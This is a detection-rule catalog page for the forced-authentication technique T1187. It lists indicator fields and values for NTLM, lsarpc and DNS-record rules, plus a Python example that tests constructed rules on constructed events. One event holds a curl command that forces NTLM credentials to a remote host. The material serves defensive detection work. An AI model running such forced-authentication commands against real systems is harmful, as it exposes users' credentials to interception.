Forced Authentication T1187

Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.

Events covered

15 catalog events are tagged with this technique by at least one rule.

Authoring guide

Patterns shared across the 21 rules listed under this technique: which fields they filter on, what specific values they look for, and what they exclude. The catalog normalizes field names across vendors, so Sigma's Image, Elastic's process.name, and Splunk's process_name collapse into one row. Each rule contributes at most once per row.

Fields filtered most (33 distinct)

The fields most rules look at when detecting this technique. The How column shows the operators authors use (eq, wildcard, regex_match, match) and how often each appears. Sample values are concrete examples to start from, not an exhaustive list.

Field                      Rules  How                        Sample values
src_ip                     5      ne 4, eq 1                 ::1, 127.0.0.1, ::
CommandLine                4      contains 4, regex_match 1  (?i)\s(-u|--user)\s*:, --ntlm, 1uwhrca, aaaaa, baaaa
user                       4      ends_with 4, ne 1          $
AuthenticationPackageName  3      eq 3                       NTLM, Kerberos
Channel                    3      eq 3, in 3
EventID                    3      eq 3                       5136, 5137, 4662, 5145
Image                      3      ends_with 3                \7z.exe, \curl.exe, \explorer.exe, \snippingtool.exe, \winrar.exe
LogonType                  3      eq 3                       Network
eventtype                  3      eq 3
AdditionalInfo             2      contains 1, wildcard 1     *UWhRC*BAAAA*MicrosoftDNS*, 1uwhrca, aaaaa, ybaaaa
ObjectClass                2      eq 2                       dnsNode
ObjectDN                   2      contains 1, wildcard 1     *UWhRC*BAAAA*MicrosoftDNS*, 1uwhrca, aaaaa, ybaaaa
RelativeTargetName         2      eq 2                       lsarpc
SubjectUserName            2      eq 2                       ANONYMOUS LOGON
TargetFilename             2      ends_with 1, in 1          *\\desktop\\*, *\\documents\\*, *\\downloads\\*, .library-ms

Top indicator values (87 distinct)

Specific (field, operator, value) combinations the rules check for, ranked by how many rules under this technique use each one. The Corpus reach column counts how many rules across the entire catalog (any technique) check the same combination. High numbers point to widely used indicators that are likely noisy on their own; combine them with another condition for useful signal. A blank Corpus reach means the combination is specific to rules under this technique.

Field                      Kind         Value                        Rules (here)  Corpus reach
src_ip                     ne           127.0.0.1                    4             21
src_ip                     ne           ::1                          4             21
user                       ends_with    $                            4             5
LogonType                  eq           Network                      3             39
AuthenticationPackageName  eq           NTLM                         2             9
EventID                    eq           5136                         2             29
EventID                    eq           5137                         2             5
ObjectClass                eq           dnsNode                      2             5
RelativeTargetName         eq           lsarpc                       2             4
SubjectUserName            eq           ANONYMOUS LOGON              2             3
computer_name              starts_with  substring(user.name, 0, -1)  2             2
file.name                  eq           FssagentRpc                  2             2
file.name                  eq           Spoolss                      2             2
file.name                  eq           WinsPipe                     2             2
file.name                  eq           dhcpserver                   2             2
file.name                  eq           dnsserver                    2             2
file.name                  eq           efsrpc                       2             2
file.name                  eq           eventlog                     2             2
file.name                  eq           lsarpc                       2             2
file.name                  eq           lsass                        2             2
file.name                  eq           netdfs                       2             2
file.name                  eq           netlogon                     2             2
file.name                  eq           samr                         2             2
file.name                  eq           srvsvc                       2             2
file.name                  eq           winreg                       2             2
AdditionalInfo             contains     1uwhrca                      1
AdditionalInfo             contains     aaaaa                        1
AdditionalInfo             contains     ybaaaa                       1
AdditionalInfo             wildcard     *UWhRC*BAAAA*MicrosoftDNS*   1
AttributeLDAPDisplayName   eq           dnstombstoned                1
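The block below is an added example, not code from the catalog page or from any of the Sigma, Elastic, Splunk or Kusto rules it summarises. It applies a handful of the field/operator/value rows from the two tables above to constructed Windows events, after collapsing vendor field names the way the authoring guide describes, and it counts how many events a single high-reach indicator hits on its own versus the full rule. The alias map, the four rule definitions and all ten events are assumptions built from the sample values listed on this page; the wildcard and regex semantics are Python's fnmatch and re, not any vendor's.

```python
import fnmatch
import re

# Vendor field names collapsed onto the catalog's normalized name. The two
# process-name aliases are quoted on this page; the two source-address aliases
# are an assumption made for this example.
FIELD_ALIASES = {
    "process.name": "Image",
    "process_name": "Image",
    "IpAddress": "src_ip",
    "source.ip": "src_ip",
}

# Operators from the "How" and "Kind" columns. eq/ne compare the string form
# exactly; the substring, wildcard and regex operators are case-insensitive.
OPERATORS = {
    "eq": lambda value, target: str(value) == str(target),
    "ne": lambda value, target: str(value) != str(target),
    "in": lambda value, target: str(value) in target,
    "contains": lambda value, target: target.lower() in str(value).lower(),
    "starts_with": lambda value, target: str(value).lower().startswith(target.lower()),
    "ends_with": lambda value, target: str(value).lower().endswith(target.lower()),
    "wildcard": lambda value, target: fnmatch.fnmatchcase(str(value).lower(), target.lower()),
    "regex_match": lambda value, target: re.search(target, str(value)) is not None,
}


def normalize(event):
    """Rename vendor-specific keys to the catalog's field names; others pass through."""
    return {FIELD_ALIASES.get(key, key): value for key, value in event.items()}


def predicate_holds(event, field, op, target):
    """A predicate on a missing field is false, so 'ne' never fires on absent data."""
    return field in event and OPERATORS[op](event[field], target)


def rule_matches(event, rule):
    """Every 'where' predicate must hold and no 'unless' exclusion may hold."""
    ev = normalize(event)
    if not all(predicate_holds(ev, *p) for p in rule["where"]):
        return False
    return not any(predicate_holds(ev, *p) for p in rule.get("unless", ()))


# Constructed rules assembled from (field, operator, value) rows in the tables above.
RULES = [
    {"name": "NTLM network logon from a remote host by a non-machine account",
     "where": [("EventID", "eq", "4624"), ("AuthenticationPackageName", "eq", "NTLM"),
               ("LogonType", "eq", "Network"), ("src_ip", "ne", "127.0.0.1"), ("src_ip", "ne", "::1")],
     "unless": [("user", "ends_with", "$")]},
    {"name": "Anonymous SMB access to the lsarpc pipe",
     "where": [("EventID", "eq", "5145"), ("RelativeTargetName", "eq", "lsarpc"),
               ("SubjectUserName", "eq", "ANONYMOUS LOGON")]},
    {"name": "dnsNode created with a wildcard-style record name",
     "where": [("EventID", "eq", "5137"), ("ObjectClass", "eq", "dnsNode"),
               ("ObjectDN", "wildcard", "*UWhRC*BAAAA*MicrosoftDNS*")]},
    {"name": "curl forced to authenticate with the caller's NTLM credentials",
     "where": [("Image", "ends_with", "\\curl.exe"), ("CommandLine", "contains", "--ntlm"),
               ("CommandLine", "regex_match", r"(?i)\s(-u|--user)\s*:")]},
]

# Constructed events (not real log data); vendor field names are deliberately mixed.
EVENTS = [
    {"EventID": 4624, "AuthenticationPackageName": "NTLM", "LogonType": "Network", "source.ip": "10.0.0.23", "user": "alice"},
    {"EventID": 4624, "AuthenticationPackageName": "NTLM", "LogonType": "Network", "IpAddress": "10.0.0.23", "user": "WS01$"},
    {"EventID": 4624, "AuthenticationPackageName": "NTLM", "LogonType": "Network", "src_ip": "127.0.0.1", "user": "alice"},
    {"EventID": 4624, "AuthenticationPackageName": "Kerberos", "LogonType": "Network", "src_ip": "10.0.0.23", "user": "alice"},
    {"EventID": 5145, "RelativeTargetName": "lsarpc", "SubjectUserName": "ANONYMOUS LOGON"},
    {"EventID": 5145, "RelativeTargetName": "lsarpc", "SubjectUserName": "alice"},
    {"EventID": 5137, "ObjectClass": "dnsNode", "ObjectDN": "DC=UWhRCBAAAA,DC=corp.example,CN=MicrosoftDNS,DC=DomainDnsZones"},
    {"EventID": 5137, "ObjectClass": "dnsNode", "ObjectDN": "DC=printer01,DC=corp.example,CN=MicrosoftDNS,DC=DomainDnsZones"},
    {"process_name": "C:\\Windows\\System32\\curl.exe", "CommandLine": "curl.exe --ntlm -u : http://10.0.0.99/x"},
    {"process.name": "C:\\Windows\\System32\\curl.exe", "CommandLine": "curl.exe -s https://example.test/"},
]


def evaluate(events, rules=RULES):
    """(event index, rule name) for every matching pair."""
    return [(i, rule["name"]) for i, ev in enumerate(events) for rule in rules if rule_matches(ev, rule)]


def indicator_hits(events, field, op, target):
    """How many events one indicator matches on its own, a stand-in for corpus reach."""
    return sum(1 for ev in events if predicate_holds(normalize(ev), field, op, target))


if __name__ == "__main__":
    for index, name in evaluate(EVENTS):
        print(f"event {index}: {name}")
    print("LogonType=Network alone hits", indicator_hits(EVENTS, "LogonType", "eq", "Network"), "events")
```

Run stand-alone it reports four matches (events 0, 4, 6 and 8). The last line makes the table's point concrete: LogonType eq Network alone hits four of the ten events, including the machine-account and loopback logons, while the full NTLM rule with the src_ip ne exclusions and the user ends_with $ exclusion hits only event 0.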

Exclusions (4 distinct)

Field/operator/value combinations excluded by rules under this technique (top-level not() clauses), sorted by how many rules exclude each. These are the false-positive paths the community has learned to filter out. A new rule that ignores the high-count entries here will likely fire on the same noisy paths.

Rules under this technique

Every rule in the catalog tagged with this technique, grouped by vendor; each rule's entry carries its full predicates, exclusions, and indicators.

Sigma 7 rules

Elastic 7 rules

Splunk 6 rules

Kusto 1 rule